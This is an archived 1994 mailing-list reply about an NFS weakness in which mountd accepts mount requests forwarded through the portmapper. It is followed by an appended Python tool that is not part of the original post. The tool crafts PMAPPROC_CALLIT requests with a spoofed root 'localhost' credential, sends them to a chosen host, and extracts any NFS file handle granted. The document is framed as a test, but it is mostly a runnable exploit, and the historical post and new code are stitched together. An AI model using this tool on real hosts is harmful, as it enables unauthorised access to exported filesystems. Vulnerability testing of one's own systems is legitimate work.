Re: RPC protocol problem?

Steinar Haug (Steinar.Haug@runit.sintef.no)
Tue, 23 Aug 1994 18:27:42 +0200 (MET DST)

> I just read a post in comp.security.unix entitled "widespread security hole
> in exporting of filesystems" which claims there are ways to break into a 
> system that has filesystems exported to itself.
> 
> Does anyone know anything about this?  The post said "the trick is to make
> RPC requests via the portmapper, in such a way that they appear to the mount
> daemon to be coming from within the host itself."
> 
> The post mentions a program that is "out there" to exploit this hole.  If
> anyone has any knowledge of this, could you please post instructions on how
> to test for this.

Yes, this knowledge is widespread. Pick up the following program
which shows how to exploit this and other well known NFS problems.
I have enclosed the starting comment from the program at the end
of this message.

Host ftp.cs.vu.nl

    Location: /leendert
           FILE -rw-r--r--       7597  May 16 15:15  nfsbug.aix.patch
           FILE -r--r--r--       3478  May  4 12:12  nfsbug.hpux.patch
           FILE -r--r--r--      36023  May  3 19:51  nfsbug.shar

Steinar Haug, SINTEF RUNIT, University of Trondheim, NORWAY
Email: Steinar.Haug@runit.sintef.no
-----------------------------------
/*
 * nfsbug.c
 *
 * Test hosts for well known NFS problems/bugs. Among these tests are:
 * find world wide exportable file systems, determine whether the
 * export list really works, determine whether we can mount file systems
 * through the portmapper, try to guess file handles, exercise the
 * mknod bug, and the uid masking bug.
 *
 * Author:
 *      Leendert van Doorn, April 1994
 *
 * TODO:
 *      - close sockets (?)
 */
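The "mount through the portmapper" test that the post describes works because the portmapper's PMAPPROC_CALLIT procedure re-sends a wrapped call to the target program from its own socket, so a mountd that trusts requests from the local host address sees one. The following is an added example, not code from Steinar Haug's message or from nfsbug.c: it builds the Sun RPC (RFC 1057) CALLIT request that wraps a MOUNTPROC_MNT call, optionally sends it to UDP port 111, and decodes the reply (NFS v2 fhstatus: a 32-bit status followed by a 32-byte file handle on success, per RFC 1094). The host name, export path, AUTH_UNIX "localhost" credential and the sample reply bytes are all constructed for illustration.

```python
"""Probe whether a portmapper will forward MOUNTPROC_MNT to mountd (PMAPPROC_CALLIT).
Added example; not part of nfsbug.c. All sample data below is constructed."""
import socket
import struct
import sys

PMAP_PROG, PMAP_VERS, PMAPPROC_CALLIT = 100000, 2, 5
MOUNT_PROG, MOUNT_VERS, MOUNTPROC_MNT = 100005, 1, 1
RPC_CALL, RPC_REPLY, RPC_VERSION = 0, 1, 2
AUTH_NULL, AUTH_UNIX = 0, 1


def xdr_u32(n):
    return struct.pack(">I", n)


def xdr_opaque(data):
    """Variable-length opaque: 4-byte length, bytes, zero padding to a 4-byte boundary."""
    return xdr_u32(len(data)) + data + b"\0" * ((-len(data)) % 4)


def xdr_string(s):
    return xdr_opaque(s.encode())


def auth_unix(machine="localhost", uid=0, gid=0):
    """AUTH_UNIX credential: stamp, machinename, uid, gid, empty gids array.
    Assumption: the target mountd expects AUTH_UNIX rather than AUTH_NULL."""
    body = xdr_u32(0) + xdr_string(machine) + xdr_u32(uid) + xdr_u32(gid) + xdr_u32(0)
    return xdr_u32(AUTH_UNIX) + xdr_opaque(body)


def rpc_call(xid, prog, vers, proc, args, cred):
    """RFC 1057 CALL message: header, credential, AUTH_NULL verifier, then arguments."""
    hdr = struct.pack(">IIIIII", xid, RPC_CALL, RPC_VERSION, prog, vers, proc)
    verf = xdr_u32(AUTH_NULL) + xdr_u32(0)
    return hdr + cred + verf + args


def callit_mount_request(xid, dirpath):
    """PMAPPROC_CALLIT(prog=mount, vers=1, proc=MNT, args=opaque(dirpath)).
    The portmapper forwards the inner call itself, so mountd sees the local host as sender."""
    inner = xdr_string(dirpath)
    args = (xdr_u32(MOUNT_PROG) + xdr_u32(MOUNT_VERS)
            + xdr_u32(MOUNTPROC_MNT) + xdr_opaque(inner))
    return rpc_call(xid, PMAP_PROG, PMAP_VERS, PMAPPROC_CALLIT, args, auth_unix())


def parse_callit_reply(data, xid):
    """Decode an accepted CALLIT reply: returns (mountd_port, mount_status, fhandle_hex).
    fhandle_hex is None unless mountd answered with status 0 (mount granted)."""
    rxid, mtype, reply_stat, _verf_flavor, verf_len = struct.unpack(">IIIII", data[:20])
    if rxid != xid or mtype != RPC_REPLY or reply_stat != 0:
        raise ValueError("not an accepted reply to our xid")
    off = 20 + verf_len + ((-verf_len) % 4)          # skip verifier body and padding
    accept_stat, port, res_len = struct.unpack(">III", data[off:off + 12])
    if accept_stat != 0:
        raise ValueError("portmapper rejected CALLIT, accept_stat=%d" % accept_stat)
    res = data[off + 12:off + 12 + res_len]           # mountd's fhstatus result
    status = struct.unpack(">I", res[:4])[0]
    fh = res[4:36].hex() if status == 0 else None      # NFS v2 fhandle is opaque[32]
    return port, status, fh


def sample_reply(xid):
    """Constructed reply: mountd on port 1023 granted the mount and returned a handle."""
    res = xdr_u32(0) + bytes(range(32))
    return (struct.pack(">IIIII", xid, RPC_REPLY, 0, AUTH_NULL, 0)
            + xdr_u32(0) + xdr_u32(1023) + xdr_opaque(res))


def probe(host, dirpath, timeout=5.0):
    """Send the request to the portmapper on UDP/111 and decode the answer.
    A silent timeout is NOT proof the host is safe: the portmapper sends no reply
    at all when the forwarded call fails, so only a decoded reply is conclusive."""
    xid = 0x1994
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.settimeout(timeout)
    try:
        s.sendto(callit_mount_request(xid, dirpath), (host, 111))
        data, _ = s.recvfrom(4096)
    except socket.timeout:
        return None
    finally:
        s.close()
    return parse_callit_reply(data, xid)


if __name__ == "__main__":
    # Usage: python nfs_callit_probe.py <host> <exported-path>   (both are assumptions)
    result = probe(sys.argv[1], sys.argv[2])
    if result is None:
        print("no reply: forwarding refused or the forwarded mount failed (inconclusive)")
    else:
        port, status, fh = result
        print("mountd port %d, mount status %d, fhandle %s" % (port, status, fh))
```

A status of 0 with a file handle in the reply means mountd accepted a mount request that arrived from the portmapper's own address, which is exactly the condition the nfsbug "mount through the portmapper" test looks for. A host that instead answers with a non-zero status, or with an accept_stat other than SUCCESS, is refusing the forwarded request.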